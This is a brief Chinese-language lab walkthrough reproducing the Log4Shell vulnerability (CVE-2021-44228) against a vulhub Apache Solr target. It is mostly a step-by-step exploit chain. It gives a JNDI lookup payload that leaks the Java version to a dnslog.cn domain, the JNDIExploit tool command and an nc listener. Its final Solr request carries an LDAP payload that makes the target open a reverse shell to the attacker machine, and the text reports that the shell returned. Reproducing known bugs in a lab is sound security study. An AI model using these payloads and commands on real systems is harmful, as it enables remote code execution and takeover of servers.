環境:
/root/CVE/vulhub-master/log4j/CVE-2021-44228
Kali 系統一個 —— 需 nc 來監聽端口信息,作為攻擊機
本機:中轉機
centOS:靶機
地址信息:
靶機 IP:192.168.1.4:8983
本機 IP:192.168.1.2
攻擊機:192.168.91.131
開啟靶機環境
請求一個 DNS 域名
http://dnslog.cn/
域名:
gswq4u.dnslog.cn
打開 hackbar,先點一下 loadURL
將資料中提供的地址,複製
將後面的域名,改為剛剛申請的
gswq4u.dnslog.cn
http://192.168.1.4:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.f6pnnm.dnslog.cn}
點擊執行,出現下面頁面
這裡獲得了反饋
現在打開 JNDIExploit-1.2,
輸入指令
java -jar .\JNDIExploit-1.2-SNAPSHOT.jar -i 本機 IP
然後在攻擊機,打開端口監聽
命令:
nc -lvp 4444
在 hackbar 構建如下命令、
http://192.168.91.132:8983/solr/admin/cores?action=${jndi:ldap://192.168.1.2:1389/Basic/ReverseShell/192.168.91.131/1234}
點擊 Execute
發現監聽的端口返回了 shell
到此復現完成